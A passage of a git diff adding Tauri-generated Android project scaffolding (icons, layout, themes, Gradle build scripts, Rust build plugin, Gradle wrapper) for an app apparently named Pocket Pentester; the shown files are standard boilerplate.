+        android:pathData="M65.3,45.828l3.8,-6.6c0.2,-0.4 0.1,-0.9 -0.3,-1.1c-0.4,-0.2 -0.9,-0.1 -1.1,0.3l-3.9,6.7c-6.3,-2.8 -13.4,-2.8 -19.7,0l-3.9,-6.7c-0.2,-0.4 -0.7,-0.5 -1.1,-0.3C38.8,38.328 38.7,38.828 38.9,39.228l3.8,6.6C36.2,49.428 31.7,56.028 31,63.928h46C76.3,56.028 71.8,49.428 65.3,45.828zM43.4,57.328c-0.8,0 -1.5,-0.5 -1.8,-1.2c-0.3,-0.7 -0.1,-1.5 0.4,-2.1c0.5,-0.5 1.4,-0.7 2.1,-0.4c0.7,0.3 1.2,1 1.2,1.8C45.3,56.528 44.5,57.328 43.4,57.328L43.4,57.328zM64.6,57.328c-0.8,0 -1.5,-0.5 -1.8,-1.2s-0.1,-1.5 0.4,-2.1c0.5,-0.5 1.4,-0.7 2.1,-0.4c0.7,0.3 1.2,1 1.2,1.8C66.5,56.528 65.6,57.328 64.6,57.328L64.6,57.328z"
+        android:strokeWidth="1"
+        android:strokeColor="#00000000" />
+</vector>
\ No newline at end of file
diff --git a/src-tauri/gen/android/app/src/main/res/drawable/ic_launcher_background.xml b/src-tauri/gen/android/app/src/main/res/drawable/ic_launcher_background.xml
new file mode 100644
index 0000000..07d5da9
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/drawable/ic_launcher_background.xml
@@ -0,0 +1,170 @@
+<?xml version="1.0" encoding="utf-8"?>
+<vector xmlns:android="http://schemas.android.com/apk/res/android"
+    android:width="108dp"
+    android:height="108dp"
+    android:viewportWidth="108"
+    android:viewportHeight="108">
+    <path
+        android:fillColor="#3DDC84"
+        android:pathData="M0,0h108v108h-108z" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M9,0L9,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M19,0L19,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M29,0L29,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M39,0L39,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M49,0L49,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M59,0L59,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M69,0L69,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M79,0L79,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M89,0L89,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M99,0L99,108"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,9L108,9"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,19L108,19"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,29L108,29"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,39L108,39"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,49L108,49"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,59L108,59"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,69L108,69"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,79L108,79"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,89L108,89"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M0,99L108,99"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M19,29L89,29"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M19,39L89,39"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M19,49L89,49"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M19,59L89,59"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M19,69L89,69"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M19,79L89,79"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M29,19L29,89"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M39,19L39,89"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M49,19L49,89"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M59,19L59,89"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M69,19L69,89"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+    <path
+        android:fillColor="#00000000"
+        android:pathData="M79,19L79,89"
+        android:strokeWidth="0.8"
+        android:strokeColor="#33FFFFFF" />
+</vector>
diff --git a/src-tauri/gen/android/app/src/main/res/layout/activity_main.xml b/src-tauri/gen/android/app/src/main/res/layout/activity_main.xml
new file mode 100644
index 0000000..4fc2444
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/layout/activity_main.xml
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="utf-8"?>
+<androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"
+    xmlns:app="http://schemas.android.com/apk/res-auto"
+    xmlns:tools="http://schemas.android.com/tools"
+    android:layout_width="match_parent"
+    android:layout_height="match_parent"
+    tools:context=".MainActivity">
+
+    <TextView
+        android:layout_width="wrap_content"
+        android:layout_height="wrap_content"
+        android:text="Hello World!"
+        app:layout_constraintBottom_toBottomOf="parent"
+        app:layout_constraintLeft_toLeftOf="parent"
+        app:layout_constraintRight_toRightOf="parent"
+        app:layout_constraintTop_toTopOf="parent" />
+
+</androidx.constraintlayout.widget.ConstraintLayout>
\ No newline at end of file
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher.png b/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher.png
new file mode 100644
index 0000000..68824c3
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher_foreground.png b/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher_foreground.png
new file mode 100644
index 0000000..b27fb04
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher_foreground.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher_round.png b/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher_round.png
new file mode 100644
index 0000000..68824c3
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-hdpi/ic_launcher_round.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher.png b/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher.png
new file mode 100644
index 0000000..01c497b
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher_foreground.png b/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher_foreground.png
new file mode 100644
index 0000000..adfdf00
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher_foreground.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher_round.png b/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher_round.png
new file mode 100644
index 0000000..01c497b
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-mdpi/ic_launcher_round.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher.png b/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher.png
new file mode 100644
index 0000000..d13217f
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher_foreground.png b/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher_foreground.png
new file mode 100644
index 0000000..8fbe5dd
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher_foreground.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png b/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png
new file mode 100644
index 0000000..d13217f
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher.png b/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher.png
new file mode 100644
index 0000000..cb2e47b
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher_foreground.png b/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher_foreground.png
new file mode 100644
index 0000000..4d04c77
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher_foreground.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png b/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png
new file mode 100644
index 0000000..cb2e47b
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png b/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png
new file mode 100644
index 0000000..6648122
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher_foreground.png b/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher_foreground.png
new file mode 100644
index 0000000..a303069
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher_foreground.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png b/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png
new file mode 100644
index 0000000..6648122
Binary files /dev/null and b/src-tauri/gen/android/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png differ
diff --git a/src-tauri/gen/android/app/src/main/res/values-night/themes.xml b/src-tauri/gen/android/app/src/main/res/values-night/themes.xml
new file mode 100644
index 0000000..6063299
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/values-night/themes.xml
@@ -0,0 +1,6 @@
+<resources xmlns:tools="http://schemas.android.com/tools">
+    <!-- Base application theme. -->
+    <style name="Theme.pocketpentester" parent="Theme.MaterialComponents.DayNight.NoActionBar">
+        <!-- Customize your theme here. -->
+    </style>
+</resources>
diff --git a/src-tauri/gen/android/app/src/main/res/values/colors.xml b/src-tauri/gen/android/app/src/main/res/values/colors.xml
new file mode 100644
index 0000000..f8c6127
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/values/colors.xml
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="utf-8"?>
+<resources>
+    <color name="purple_200">#FFBB86FC</color>
+    <color name="purple_500">#FF6200EE</color>
+    <color name="purple_700">#FF3700B3</color>
+    <color name="teal_200">#FF03DAC5</color>
+    <color name="teal_700">#FF018786</color>
+    <color name="black">#FF000000</color>
+    <color name="white">#FFFFFFFF</color>
+</resources>
\ No newline at end of file
diff --git a/src-tauri/gen/android/app/src/main/res/values/strings.xml b/src-tauri/gen/android/app/src/main/res/values/strings.xml
new file mode 100644
index 0000000..231d652
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/values/strings.xml
@@ -0,0 +1,4 @@
+<resources>
+    <string name="app_name">Pocket Pentester</string>
+    <string name="main_activity_title">Pocket Pentester</string>
+</resources>
diff --git a/src-tauri/gen/android/app/src/main/res/values/themes.xml b/src-tauri/gen/android/app/src/main/res/values/themes.xml
new file mode 100644
index 0000000..6063299
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/values/themes.xml
@@ -0,0 +1,6 @@
+<resources xmlns:tools="http://schemas.android.com/tools">
+    <!-- Base application theme. -->
+    <style name="Theme.pocketpentester" parent="Theme.MaterialComponents.DayNight.NoActionBar">
+        <!-- Customize your theme here. -->
+    </style>
+</resources>
diff --git a/src-tauri/gen/android/app/src/main/res/xml/file_paths.xml b/src-tauri/gen/android/app/src/main/res/xml/file_paths.xml
new file mode 100644
index 0000000..782d63b
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/xml/file_paths.xml
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="utf-8"?>
+<paths xmlns:android="http://schemas.android.com/apk/res/android">
+  <external-path name="my_images" path="." />
+  <cache-path name="my_cache_images" path="." />
+</paths>
diff --git a/src-tauri/gen/android/build.gradle.kts b/src-tauri/gen/android/build.gradle.kts
new file mode 100644
index 0000000..607240b
--- /dev/null
+++ b/src-tauri/gen/android/build.gradle.kts
@@ -0,0 +1,22 @@
+buildscript {
+    repositories {
+        google()
+        mavenCentral()
+    }
+    dependencies {
+        classpath("com.android.tools.build:gradle:8.11.0")
+        classpath("org.jetbrains.kotlin:kotlin-gradle-plugin:1.9.25")
+    }
+}
+
+allprojects {
+    repositories {
+        google()
+        mavenCentral()
+    }
+}
+
+tasks.register("clean").configure {
+    delete("build")
+}
+
diff --git a/src-tauri/gen/android/buildSrc/build.gradle.kts b/src-tauri/gen/android/buildSrc/build.gradle.kts
new file mode 100644
index 0000000..5c55bba
--- /dev/null
+++ b/src-tauri/gen/android/buildSrc/build.gradle.kts
@@ -0,0 +1,23 @@
+plugins {
+    `kotlin-dsl`
+}
+
+gradlePlugin {
+    plugins {
+        create("pluginsForCoolKids") {
+            id = "rust"
+            implementationClass = "RustPlugin"
+        }
+    }
+}
+
+repositories {
+    google()
+    mavenCentral()
+}
+
+dependencies {
+    compileOnly(gradleApi())
+    implementation("com.android.tools.build:gradle:8.11.0")
+}
+
diff --git a/src-tauri/gen/android/buildSrc/src/main/java/com/imtaqin/pocketpentester/kotlin/BuildTask.kt b/src-tauri/gen/android/buildSrc/src/main/java/com/imtaqin/pocketpentester/kotlin/BuildTask.kt
new file mode 100644
index 0000000..a3de125
--- /dev/null
+++ b/src-tauri/gen/android/buildSrc/src/main/java/com/imtaqin/pocketpentester/kotlin/BuildTask.kt
@@ -0,0 +1,68 @@
+import java.io.File
+import org.apache.tools.ant.taskdefs.condition.Os
+import org.gradle.api.DefaultTask
+import org.gradle.api.GradleException
+import org.gradle.api.logging.LogLevel
+import org.gradle.api.tasks.Input
+import org.gradle.api.tasks.TaskAction
+
+open class BuildTask : DefaultTask() {
+    @Input
+    var rootDirRel: String? = null
+    @Input
+    var target: String? = null
+    @Input
+    var release: Boolean? = null
+
+    @TaskAction
+    fun assemble() {
+        val executable = """npm""";
+        try {
+            runTauriCli(executable)
+        } catch (e: Exception) {
+            if (Os.isFamily(Os.FAMILY_WINDOWS)) {
+                // Try different Windows-specific extensions
+                val fallbacks = listOf(
+                    "$executable.exe",
+                    "$executable.cmd",
+                    "$executable.bat",
+                )
+                
+                var lastException: Exception = e
+                for (fallback in fallbacks) {
+                    try {
+                        runTauriCli(fallback)
+                        return
+                    } catch (fallbackException: Exception) {
+                        lastException = fallbackException
+                    }
+                }
+                throw lastException
+            } else {
+                throw e;
+            }
+        }
+    }
+
+    fun runTauriCli(executable: String) {
+        val rootDirRel = rootDirRel ?: throw GradleException("rootDirRel cannot be null")
+        val target = target ?: throw GradleException("target cannot be null")
+        val release = release ?: throw GradleException("release cannot be null")
+        val args = listOf("run", "--", "tauri", "android", "android-studio-script");
+
+        project.exec {
+            workingDir(File(project.projectDir, rootDirRel))
+            executable(executable)
+            args(args)
+            if (project.logger.isEnabled(LogLevel.DEBUG)) {
+                args("-vv")
+            } else if (project.logger.isEnabled(LogLevel.INFO)) {
+                args("-v")
+            }
+            if (release) {
+                args("--release")
+            }
+            args(listOf("--target", target))
+        }.assertNormalExitValue()
+    }
+}
\ No newline at end of file
diff --git a/src-tauri/gen/android/buildSrc/src/main/java/com/imtaqin/pocketpentester/kotlin/RustPlugin.kt b/src-tauri/gen/android/buildSrc/src/main/java/com/imtaqin/pocketpentester/kotlin/RustPlugin.kt
new file mode 100644
index 0000000..4aa7fca
--- /dev/null
+++ b/src-tauri/gen/android/buildSrc/src/main/java/com/imtaqin/pocketpentester/kotlin/RustPlugin.kt
@@ -0,0 +1,85 @@
+import com.android.build.api.dsl.ApplicationExtension
+import org.gradle.api.DefaultTask
+import org.gradle.api.Plugin
+import org.gradle.api.Project
+import org.gradle.kotlin.dsl.configure
+import org.gradle.kotlin.dsl.get
+
+const val TASK_GROUP = "rust"
+
+open class Config {
+    lateinit var rootDirRel: String
+}
+
+open class RustPlugin : Plugin<Project> {
+    private lateinit var config: Config
+
+    override fun apply(project: Project) = with(project) {
+        config = extensions.create("rust", Config::class.java)
+
+        val defaultAbiList = listOf("arm64-v8a", "armeabi-v7a", "x86", "x86_64");
+        val abiList = (findProperty("abiList") as? String)?.split(',') ?: defaultAbiList
+
+        val defaultArchList = listOf("arm64", "arm", "x86", "x86_64");
+        val archList = (findProperty("archList") as? String)?.split(',') ?: defaultArchList
+
+        val targetsList = (findProperty("targetList") as? String)?.split(',') ?: listOf("aarch64", "armv7", "i686", "x86_64")
+
+        extensions.configure<ApplicationExtension> {
+            @Suppress("UnstableApiUsage")
+            flavorDimensions.add("abi")
+            productFlavors {
+                create("universal") {
+                    dimension = "abi"
+                    ndk {
+                        abiFilters += abiList
+                    }
+                }
+                defaultArchList.forEachIndexed { index, arch ->
+                    create(arch) {
+                        dimension = "abi"
+                        ndk {
+                            abiFilters.add(defaultAbiList[index])
+                        }
+                    }
+                }
+            }
+        }
+
+        afterEvaluate {
+            for (profile in listOf("debug", "release")) {
+                val profileCapitalized = profile.replaceFirstChar { it.uppercase() }
+                val buildTask = tasks.maybeCreate(
+                    "rustBuildUniversal$profileCapitalized",
+                    DefaultTask::class.java
+                ).apply {
+                    group = TASK_GROUP
+                    description = "Build dynamic library in $profile mode for all targets"
+                }
+
+                tasks["mergeUniversal${profileCapitalized}JniLibFolders"].dependsOn(buildTask)
+
+                for (targetPair in targetsList.withIndex()) {
+                    val targetName = targetPair.value
+                    val targetArch = archList[targetPair.index]
+                    val targetArchCapitalized = targetArch.replaceFirstChar { it.uppercase() }
+                    val targetBuildTask = project.tasks.maybeCreate(
+                        "rustBuild$targetArchCapitalized$profileCapitalized",
+                        BuildTask::class.java
+                    ).apply {
+                        group = TASK_GROUP
+                        description = "Build dynamic library in $profile mode for $targetArch"
+                        rootDirRel = config.rootDirRel
+                        target = targetName
+                        release = profile == "release"
+                    }
+
+                    buildTask.dependsOn(targetBuildTask)
+                    tasks["merge$targetArchCapitalized${profileCapitalized}JniLibFolders"].dependsOn(
+                        targetBuildTask
+                    )
+                }
+            }
+        }
+    }
+}
\ No newline at end of file
diff --git a/src-tauri/gen/android/gradle.properties b/src-tauri/gen/android/gradle.properties
new file mode 100644
index 0000000..2a7ec69
--- /dev/null
+++ b/src-tauri/gen/android/gradle.properties
@@ -0,0 +1,24 @@
+# Project-wide Gradle settings.
+# IDE (e.g. Android Studio) users:
+# Gradle settings configured through the IDE *will override*
+# any settings specified in this file.
+# For more details on how to configure your build environment visit
+# http://www.gradle.org/docs/current/userguide/build_environment.html
+# Specifies the JVM arguments used for the daemon process.
+# The setting is particularly useful for tweaking memory settings.
+org.gradle.jvmargs=-Xmx2048m -Dfile.encoding=UTF-8
+# When configured, Gradle will run in incubating parallel mode.
+# This option should only be used with decoupled projects. More details, visit
+# http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects
+# org.gradle.parallel=true
+# AndroidX package structure to make it clearer which packages are bundled with the
+# Android operating system, and which are packaged with your app"s APK
+# https://developer.android.com/topic/libraries/support-library/androidx-rn
+android.useAndroidX=true
+# Kotlin code style for this project: "official" or "obsolete":
+kotlin.code.style=official
+# Enables namespacing of each library's R class so that its R class includes only the
+# resources declared in the library itself and none from the library's dependencies,
+# thereby reducing the size of the R class for that library
+android.nonTransitiveRClass=true
+android.nonFinalResIds=false
\ No newline at end of file
diff --git a/src-tauri/gen/android/gradle/wrapper/gradle-wrapper.jar b/src-tauri/gen/android/gradle/wrapper/gradle-wrapper.jar
new file mode 100644
index 0000000..e708b1c
Binary files /dev/null and b/src-tauri/gen/android/gradle/wrapper/gradle-wrapper.jar differ
diff --git a/src-tauri/gen/android/gradle/wrapper/gradle-wrapper.properties b/src-tauri/gen/android/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 0000000..c5f9a53
--- /dev/null
+++ b/src-tauri/gen/android/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,6 @@
+#Tue May 10 19:22:52 CST 2022
+distributionBase=GRADLE_USER_HOME
+distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.3-bin.zip
+distributionPath=wrapper/dists
+zipStorePath=wrapper/dists
+zipStoreBase=GRADLE_USER_HOME
diff --git a/src-tauri/gen/android/gradlew b/src-tauri/gen/android/gradlew
new file mode 100644
index 0000000..4f906e0
--- /dev/null
+++ b/src-tauri/gen/android/gradlew
@@ -0,0 +1,185 @@
+#!/usr/bin/env sh
+
+#
+# Copyright 2015 the original author or authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+##############################################################################
+##
+##  Gradle start up script for UN*X
+##
+##############################################################################
+
+# Attempt to set APP_HOME
+# Resolve links: $0 may be a link
+PRG="$0"
+# Need this for relative symlinks.
+while [ -h "$PRG" ] ; do
+    ls=`ls -ld "$PRG"`
+    link=`expr "$ls" : '.*-> \(.*\)$'`
+    if expr "$link" : '/.*' > /dev/null; then
+        PRG="$link"
+    else
+        PRG=`dirname "$PRG"`"/$link"
+    fi
+done
+SAVED="`pwd`"
+cd "`dirname \"$PRG\"`/" >/dev/null
+APP_HOME="`pwd -P`"
+cd "$SAVED" >/dev/null
+
+APP_NAME="Gradle"
+APP_BASE_NAME=`basename "$0"`
+
+# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
+DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"'
+
+# Use the maximum available, or set MAX_FD != -1 to use that value.
+MAX_FD="maximum"
+
+warn () {
+    echo "$*"
+}
+
+die () {
+    echo
+    echo "$*"
+    echo
+    exit 1
+}
+
+# OS specific support (must be 'true' or 'false').
+cygwin=false
+msys=false
+darwin=false
+nonstop=false
+case "`uname`" in
+  CYGWIN* )
+    cygwin=true
+    ;;
+  Darwin* )
+    darwin=true
+    ;;
+  MINGW* )
+    msys=true
+    ;;
+  NONSTOP* )
+    nonstop=true
+    ;;
+esac
+
+CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
+
+
+# Determine the Java command to use to start the JVM.
+if [ -n "$JAVA_HOME" ] ; then
+    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
+        # IBM's JDK on AIX uses strange locations for the executables
+        JAVACMD="$JAVA_HOME/jre/sh/java"
+    else
+        JAVACMD="$JAVA_HOME/bin/java"
+    fi
+    if [ ! -x "$JAVACMD" ] ; then
+        die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+    fi
+else
+    JAVACMD="java"
+    which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+fi
+
+# Increase the maximum file descriptors if we can.
+if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then
+    MAX_FD_LIMIT=`ulimit -H -n`
+    if [ $? -eq 0 ] ; then
+        if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
+            MAX_FD="$MAX_FD_LIMIT"
+        fi
+        ulimit -n $MAX_FD
+        if [ $? -ne 0 ] ; then
+            warn "Could not set maximum file descriptor limit: $MAX_FD"
+        fi
+    else
+        warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
+    fi
+fi
+
+# For Darwin, add options to specify how the application appears in the dock
+if $darwin; then
+    GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
+fi
+
+# For Cygwin or MSYS, switch paths to Windows format before running java
+if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then
+    APP_HOME=`cygpath --path --mixed "$APP_HOME"`
+    CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
+
+    JAVACMD=`cygpath --unix "$JAVACMD"`
+
+    # We build the pattern for arguments to be converted via cygpath
+    ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
+    SEP=""
+    for dir in $ROOTDIRSRAW ; do
+        ROOTDIRS="$ROOTDIRS$SEP$dir"
+        SEP="|"
+    done
+    OURCYGPATTERN="(^($ROOTDIRS))"
+    # Add a user-defined pattern to the cygpath arguments
+    if [ "$GRADLE_CYGPATTERN" != "" ] ; then
+        OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
+    fi
+    # Now convert the arguments - kludge to limit ourselves to /bin/sh
+    i=0
+    for arg in "$@" ; do
+        CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
+        CHECK2=`echo "$arg"|egrep -c "^-"`                                 ### Determine if an option
+
+        if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then                    ### Added a condition
+            eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
+        else
+            eval `echo args$i`="\"$arg\""
+        fi
+        i=`expr $i + 1`
+    done
+    case $i in
+        0) set -- ;;
+        1) set -- "$args0" ;;
+        2) set -- "$args0" "$args1" ;;
+        3) set -- "$args0" "$args1" "$args2" ;;
+        4) set -- "$args0" "$args1" "$args2" "$args3" ;;
+        5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
+        6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
+        7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
+        8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
+        9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
+    esac
+fi
+
+# Escape application args
+save () {
+    for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done
+    echo " "
+}
+APP_ARGS=`save "$@"`
+
+# Collect all arguments for the java command, following the shell quoting and substitution rules
+eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS"
+
+exec "$JAVACMD" "$@"
diff --git a/src-tauri/gen/android/gradlew.bat b/src-tauri/gen/android/gradlew.bat
new file mode 100644
index 0000000..107acd3
--- /dev/null
+++ b/src-tauri/gen/android/gradlew.bat
@@ -0,0 +1,89 @@
+@rem
+@rem Copyright 2015 the original author or authors.
